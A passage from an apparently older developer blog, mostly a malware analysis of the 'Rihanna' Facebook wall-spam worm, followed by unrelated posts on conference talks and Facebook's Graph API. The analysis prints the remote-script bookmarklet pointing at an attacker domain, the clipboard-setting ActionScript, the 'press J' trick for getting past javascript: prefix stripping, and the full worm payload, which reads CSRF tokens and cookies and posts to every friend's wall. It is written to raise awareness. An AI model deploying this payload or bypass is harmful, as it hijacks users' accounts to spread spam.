Analyzing the new “Rihanna” Facebook spam

rihanna-7Some of you might have seen a fast spreading spam on Facebook with the name “Rihanna” (named after the popular singer/recording artist), as in the screen shot. We have been seeing several spam messages on Facebook these days and it appears this is yet another social engineering trick by spammers.

However, the speed at which it is spreading definitely boasts about the good success rate of the spam and to its credit, this “wall flooding” spam has some interesting technical learning.

1. This is not based on Clickjacking, though a non-clickable video icon appears misleading.

2. Unlike many spams, this does not leave facebook.com and navigate to a new domain. It spreads through facebook pages itself, which is convincing.

3. It lures the user to paste code in browser’s address bar convincingly (old wine in new bottle).

Overview: On clicking the spam post (link is in the above screenshot), the user will be redirected to attacker’s facebook page as shown in the screenshots below. Initially a youtube like video appears (this is a “.swf” file which plays the key role). After a few seconds, It changes itself into a “security check” text with “continue” button as in the pic. On clicking the “continue” button, the 3 convincing instructions appear, following which a malicious JavaScript is injected into the active window. The injected malicious script posts the above message and obscene images on the wall of ALL friends of the user!

rihanna-blog

Technical details:

Once the user follows all the instructions, the JavaScript snippet shown below is injected into the browser, which has “src” attribute pointing to the actual malicious .js file (masked the url in the screenshot & snippet). In fact, this is a commonly used technique for creating bookmarklets and adding them to your browser’s bookmarklet toolbar. When used maliciously for attracting users to perform undesirable action, it is referred to as “Socially engineered XSS attack”. 

javascript:(a=(b=document).createElement('script')).src='http://free-xx-xx.info/rihh.js',b.body.appendChild(a);void(0)

This .js file has the logic for doing all the harm but there doesn’t end the matter. The unanswered questions are, how did this script get into user’s clipboard? The user never copied any code snippet manually and browsers’ sandbox model doesn’t allow cross domain JavaScript to access clipboard without explicit permission. Also, what is the need for the inquisitive instruction “Press J on your keyboard”?

1. On analyzing the source of the above facebook page using browser developer tool bars (IE Dev toolbar, Firebug etc), one can see an iframe which points to attacker’s external website (looks like the attacker maintains several malicious domains).

2. Now, inspecting the source of the attacker’s external webpage shows that it embeds a flash (.swf) file which mimics genuine youtube video.

3. Going a step further, inspecting the source of this “.swf” file (using one of the online flash decompilers) gives the code which does the actual harm! It has a timer which changes the youtube like image to the security check screen. On clicking the “continue” button, the below action script is triggered, which intuitively sets text to clipboard.

//This is action script code from attacker's ".swf" file.
on (release) {
System.setClipboard("avascript:(a=(b=document).createElement('script')).src='http://free-xx-xx.info/rihh.js',
b.body.appendChild(a);void(0)");
_root.play();
}

Notice the first word of the text which is being set into the clipboard, “avascript:”. It is NOT a typo. It should actually be “javascript:” but the letter “j” is omitted for a rather compelling reason!

“JavaScript:” prefix and modern browsers:

Much to the annoyance of spammers, modern browsers implemented a less known but very interesting security feature. Any code with “JavaScript:” prefix pasted into the address bar will get the prefix stripped off, thereby preventing script execution. Internet Explorer 9 pioneered this and recently other browser vendors came up with their own implementations.

//Copy this JavaScript snippet, open IE9 and paste in address bar.
//You will notice that the "javascript:" prefix will be magically stripped off!
javascript:alert('foo');

Coming back to the “.swf” file, to bypass the above browser defense mechanism in some popular browsers, the letter “J” of JavaScript is omitted while setting the script to clipboard. So the spammers cleverly asked the users to first press the letter “J” and then press “Ctrl+V” and hit enter. This completes the full snippet with “javascript:” prefix thereby bypassing prefix stripping. Isn’t this smart? Though this extra step is expected to reduce success rate of attacks, it somewhat increased the curiosity of users.

NOTE: Internet Explorer 9 doesn't even allow combinations like typing "j" and pasting "avascript:alert('hi');" in the address bar. So this attack will fail in IE9! YaY!!

Chrome 16.0.912.41 in my machine strips the "javascript:" prefix when "javascript:alert('hi');" is pasted directly, but allows typing "j" and pasting "avascript:alert('hi');".

For the curious folks, here is the entire JavaScript code injected by the attack. It executes in the context of user’s facebook window with full previleges!

var post_form_id = document['getElementsByName']('post_form_id')[0]['value'];
var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);
var httpwp = new XMLHttpRequest();
var urlwp = '/ajax/profile/composer.php?__a=1';
var paramswp = 'post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&xhpc_composerid=u3bbpq_21&xhpc_targetid=' + user_id + '&xhpc_context=profile&xhpc_location=&xhpc_fbx=1&xhpc_timeline=&xhpc_ismeta=1&xhpc_message_text=HEY%20CHECK%20THIS%20OUT&xhpc_message=HEY%20CHECK%20THIS%20OUT&aktion=post&app_id=2309869772&attachment[params][0]=156861974410959&attachment[type]=18&composertags_place=&composertags_place_name=&composer_predicted_city=102186159822587&composer_session_id=1320586865&is_explicit_place=&audience[0][value]=80&composertags_city=&disable_location_sharing=false&nctr[_mod]=pagelet_wall&lsd&post_form_id_source=AsyncRequest&__user=' + user_id + '';
httpwp['open']('POST', urlwp, true);
httpwp['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
httpwp['setRequestHeader']('Content-length', paramswp['length']);
httpwp['setRequestHeader']('Connection', 'keep-alive');
httpwp['send'](paramswp);
var friends = new Array();
gf = new XMLHttpRequest();
gf['open']('GET', '/ajax/typeahead/first_degree.php?__a=1&viewer=' + user_id + '&token' + Math['random']() + '&filter[0]=user&options[0]=friends_only', false);
gf['send']();
if (gf['readyState'] != 4) {} else {
data = eval('(' + gf['responseText']['substr'](9) + ')');
if (data['error']) {} else {
friends = data['payload']['entries']['sort'](function (_0x93dax8, _0x93dax9) {
return _0x93dax8['index'] - _0x93dax9['index'];
});
};
};
for (var i = 0; i < friends['length']; i++) {
var httpwp = new XMLHttpRequest();
var urlwp = '/ajax/profile/composer.php?__a=1';
var paramswp = 'post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&xhpc_composerid=u2qr0v_15&xhpc_targetid=' + friends[i]['uid'] + '&xhpc_context=profile&xhpc_location=&xhpc_fbx=1&xhpc_timeline=&xhpc_ismeta=1&xhpc_message_text=Oh%20my%20god%2Ccheck%20this&xhpc_message=Oh%20my%20god%2Ccheck%20this&aktion=post&app_id=2309869772&attachment[params][0]=156861974410959&attachment[type]=18&composertags_place=&composertags_place_name=&composer_predicted_city=102186159822587&composer_session_id=1320585896&is_explicit_place=&audience[0][value]=80&composertags_city=&disable_location_sharing=false&nctr[_mod]=pagelet_wall&lsd&post_form_id_source=AsyncRequest&__user=' + user_id + '&';
httpwp['open']('POST', urlwp, true);
httpwp['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
httpwp['setRequestHeader']('Content-length', paramswp['length']);
httpwp['setRequestHeader']('Connection', 'keep-alive');
httpwp['onreadystatechange'] = function () {
if (httpwp['readyState'] == 4 && httpwp['status'] == 200) {};
};
httpwp['send'](paramswp);
};
document['getElementById']('contentArea')['innerHTML'] = '<center><br><br><br><br><br><img src="http://www.hindustantimes.com/images/loading_gif.gif" /><br />Please wait...</center>';
setTimeout('top.location=\'http://free-xx-xx.info/play-video.php\';', 20000);

There are several variants of this spam residing at different URLs in facebook pages. Facebook has been blocking these variants one by one and by the time of writing this post even the url in the pic is blocked.

Hope this article helped in understanding how spammers think and gave a feel of the damage that can be done by simple games/apps on the web, if you are not careful. Do share this with your friends and increase awareness.

Happy & secure browsing :)

It is this easy to steal your click!-DevCon 2011

The memories of DevCon 2010, where I presented on “Facebook Apps Development” are still fresh in mind and DevCon 2011 is back! This time I have presented on “Clickjacking”, one of the popular modern web based attacks, using which an attacker can steal user’s click. The session is heavily inspired by the research done by Stanford Security Lab & Internet Explorer Team. It focuses on explaining how users fall prey to clickjacking attacks and what care web developers should take to defend against them.

The event, organized by Microsoft User Group Hyderabad (MUGH), had more than 300 audience and was held at Microsoft Hyderabad campus. 

agenda!

Presentation: check Slideshare

Demos source code: check GitHub

There were several interesting sessions presented by speakers on cutting edge topics such as Windows Azure, ASP.NET MVC3, Bringing HTML5 experiences to ASP.NET website, Patterns & Practices in C#, SharePoint 2010, SQL Server Denali and Knotting Windows phone 7, Azure & Kinect. The audience were very enthusiastic and interactive, which made the sessions lively. Nice to meet several techies in the event. The learning I had was huge while preparing for this session and answering Q &A :)

Integrating Social Networks with ASP.NET-Virtual Tech Days 2010

Happy to say that I have presented at Virtual Tech Days 2010 on "Integrating Social Networks with ASP.NET" in Developer's Track. It was a 3 day online technical event (Nov 22-24, 2010) with ~75 sessions from 55 Industry experts on Microsoft technologies.

My presentation: Click here

Demos: Click here

The sessions were scheduled for Developer and IT Pro folks, spanning over Web Development, Windows Client Development,  Database and BI Development, Windows Client, Online Services, Security, Rich Web Experiences, SharePoint 2010, Windows Azure, Datacenter, Database Administration, Interopirability with Microsoft Technologies and Hands On Labs. In case you missed the event online, you can download the presentations and videos from the site shortly. 

Though I could not meet developers in person, I enjoyed presenting a demo filled session, which I hope would be useful for developers to start off with social networking APIs in their ASP.NET websites. If you couldn't get a chance to ask questions during the session, you can always tweet me.

So what next? Microsoft Community Tech Days is coming on December 18th, 2010. Venue is Microsoft Hyd campus. I've seen lots of hot topics being prepared by community folks! Dont miss it!!

Happy programming :)  

Programming the Social Web with Facebook's Open Graph API

A couple of weeks back I have presented on Facebook Apps Development at DevCon 2010 and it was nice to see overwhelming response. In this article, I shall throw light on FaceBook's new social features, to help developers getting started with Facebook apps development.

The Facebook F8 conference is an yearly event hosted by Facebook, to bring developers & entreprenuers together to build the social web. With the previous events announcing the Social graph & Facebook Connect, the 2010 F8 (21st April, 2010) had big news for the evolution of social web, briefly:

  • The Graph API
  • oAuth 2.0 based authorization
  • Social plugins
  • The Open Graph protocol.

The Graph API, which is the core of Facebook Platform, gives developers the power to share and make the web more open & connected. Mark Zuckerberg, founder of Facebook, coined the term "Social Graph" which means "the global mapping of everybody and how they're related". By definition, the social graph is composed of objects(people, pages, events, communities, photos etc) and the connections(relationship, tagging, grouping etc) between them. Every object in the graph has a unique ID by which it can be referenced.

Technically speaking, Facebook offers REST based service which can be used to query about any object in the graph.

e.g., To get public info about Bill Gates on Facebook, click the following link: https://graph.facebook.com/billgates.

[Note: When you click the above link, the query gives JSON output, which contains data about the requested object. IE will ask to download the output which can be opened in notepad, where as Firefox/Chrome/Safari will open in new tab directly.]

Similarly, you can get info about the recent Microsoft PDC as: http://graph.facebook.com/MicrosoftPDC. You can even introspect a bit deep and get additional info as: http://graph.facebook.com/MicrosoftPDC?metadata=1

Notice that in the above cases, we are retrieving only public info. To get private info, you need to get authenticated by Facebook and append an "access_token" parameter in query string like: https://graph.facebook.com/microsoftpdc/feed?access_token=xxxxxxxxxxxxxxx.

To see how it works, login to facebook.com and then open http://developers.facebook.com/docs/api in new tab. Scroll down to connections section and click on any connection like "Friends", "News Feed", "Profile feed" etc. The url looks like this: https://graph.facebook.com/me/friends?access_token='A set of random characters which FB gives you after authentication'.You will be able to see complete private information, which is not available without authentication.

oAuth 2.0 is new authorization mechanism which is used by Facebook. It is an open protocol which allows secure API authorization without the need for entering credentials(passwords).It relies on the exchange of tokens instead of credentials and is more secure.

In layman's terms, when you add applications like FarmVille, you will get a confirmation box with "Allow/Deny" buttons. When you click the "Allow" button, the application will be added to your graph. Behind the screens, the app uses oAuth to authorize you via exchange of tokens. More about it in my upcoming article.

Social Plugins are extensions of Facebook which can be embeded in your websites, creating social experiences. The famous "Like" button, login button, recommendations etc are some of the social plugins. They can be embeded into any existing site using FBML and Facebook JavaScript API. The official reference is clearly the best guide for learning about the social plugins.

The Open Graph Protocol helps in turning out your web pages into more meaningful objects in social graph (Did i say something similar for social plugins too? Wait., there is more to say).

By adding a like button, you only add a link to your page in facebook's social graph, which does not have any other information. But by adding <meta> tags of Open Graph protocol on your web page's header, you are sharing more semantic data about your webpage, such as, title of the content, type of content, description, image etc. Since the protocol is open, these tags can be read by facebook (or any other network in future) to provide more meaningful information to users.

So, by using the Graph API, oAuth, social plugins and the Open Graph Protocol, you can fetch data about any object in the social graph, present it in a semantic way and provide social experiences to the 500 million(& growing) Facebook users on your site!

In my upcoming articles, I shall write in depth about each of these, explaining with code how they work.

Happy Coding Smile

Facebook Apps Development-DevCon 2010

Happy to say that I have presented at DevCon 2010 on "Facebook Apps Development for web devs" at Microsoft Hyderabad. The event, organized by Microsoft User Group Hyderabad (MUGH), had 250+ audience in Developer and IT Pro track! The highlight of the event is the session given by the talented Aaron Skonnard, CEO of PluralSight!

 

Presentation: Click here

Demo Facebook App: Click here

Met several geeks & hackers in the event and made good techie friends. Having a chat with Aaron, attending his live session and having him in my session was really awesome! It was difficult trying to explain about Facebook oAuth in the stipulated time, but I'l surely blog about it with good demos very soon. Hope the audience had a great time!